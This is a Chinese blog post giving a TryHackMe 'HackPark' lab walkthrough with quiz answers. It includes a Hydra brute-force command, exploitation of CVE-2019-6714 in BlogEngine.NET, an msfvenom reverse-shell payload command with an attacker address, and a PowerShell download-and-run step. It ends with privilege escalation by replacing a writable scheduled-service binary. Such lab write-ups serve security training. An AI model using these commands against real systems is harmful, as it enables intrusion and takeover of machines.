TryHackMe-HackPark-Writeup

已于 2025-04-27 11:08:05 修改
阅读量607 收藏 16
点赞数 25
CC 4.0 BY-SA版权
分类专栏: TryHackMe_Writeup 文章标签: http 网络协议 web安全 笔记 网络安全 安全 系统安全
于 2025-04-26 14:31:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/treeywind/article/details/147533848

HackPark

使用 Hydra 暴力登录网站,识别并使用公共漏洞,然后权限提升

使用 Hydra 暴力破解登录

What request type is the Windows website login form using?

POST

现在我们知道了请求类型并有了登录表单的 URL,我们可以开始暴力破解

可以使用 burpsuite 来获取 POST 数据包,然后填写 hydra 命令,hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form来对于 POST 表单进行爆破,注意这里 F=Login Failed才可以爆破出来正确的密码

Guess a username, choose a password wordlist and gain credentials to a user account!

1qaz2wsx

破坏机器

在拿到密码后,登录网站在 about 页面中可以找到 BlogEnigne 的版本

Now you have logged into the website, are you able to identify the version of the BlogEngine?

3.3.6.0

BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution

在 exploit 中查询找到一个 RCE 漏洞

What is the CVE?

CVE-2019-6714

下载了漏洞利用 exp,可以阅读注释了解使用规则

  1. 在这个方法中设置了 TcpClient的地址和端口是我们攻击主机和端口
  2. 这个文件必须要被命名为 PostView.ascx 才可以成功利用
  3. 上传成功后文件被保存在网站根目录下的 /App_Data/files目录下
  4. 访问博客主页,在 URL 中加上一个 theme 参数进行路径穿越

首先,先打开一个端口进行接收 shell

在这里上传好,把 URL 改一下,就可以拿到 shell 了,使用 whoami命令可以查看到当前的身份

Who is the webserver running as?

iis apppool\blog

Windows 权限提升

首先,我们要从 netcat 转向 meterpreter 会话,然后来枚举机器来识别潜在的漏洞,然后利用这些收集到的信息来利用系统并成为管理员

先使用 msfvenom 生成一个木马程序来连接机器,msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.74.121 LPORT=6969 -f exe -o shell.exe

然后再 msfconsole 中设置好后,准备连接

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST
set LPORT
run

使用 pyhon -m http.server 8989在 shell.exe 文件目录下开启一个文件服务器,然后在之前 nc 连接的 shell 中使用 powershell -c wget "http://IP 地址:8989/shell.exe" -outfile shell.exe来下载文件,然后 shell.exe来运行,就可以获得 meterpreter 会话

之后你可以运行 sysinfo等 metasploit 命令来获取有关 Windows 系统的详细信息

What is the OS version of this windows machine?

Windows 2012 R2 (6.3 Build 9600)

权限提升辅助工具

在 meterpreter 会话中使用 upload winPEASx64.exe,把这个文件上传到目标机器中

然后运行 winPEASx64.exe查看可以利用的提权点

在这里可以发现高危的提权点,是 System Scheduler Service,并且任何人对他都有写入权限,你也可以进入这个目录,查看 events目录中的日志文件发现他每隔 30s 运行一次

Can you spot a service running some automated task that could be easily exploited? What is the name of this service?

WindowsScheduler

What is the name of the binary you're supposed to exploit?

Message.exe

所以我们的思路就是直接替换 Message.exe 文件来实现权限的提升

我们先使用 msfvenom重新使用一个端口生成利用文件,名字是 Message.exe

注意要从 shell 回到 meterpreter 会话中,先使用 mv把目录中的 Message 文件重命名,方便后续下载放入我们的文件

这里要注意目录是否在服务的目录(c:\Program Files (x86)\SystemScheduler),可以使用 pwd查看当前的目录

然后使用 background退回到 msfconsole 中,重新使用 set LPORT指定之前时使用的新的端口,然后过一会就可以拿到管理员权限的 shell 了

之后再到用户桌面和根用户就可以查看到文件的 flag 了

不使用 Metasploit 的权限提升

注意: C:\Windows\Temp目录是全局可写的,没有权限的时候文件都可以上传到这个目录使用

查看机器的原始安装时间是多久,我这里还是使用的 winPEAS查看了各个用户的注册时间,管理员的注册时间差不多就是机器的原始安装时间

Using winPeas, what was the Original Install time? (This is date and time)

8/3/2019, 10:43:23 AM

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值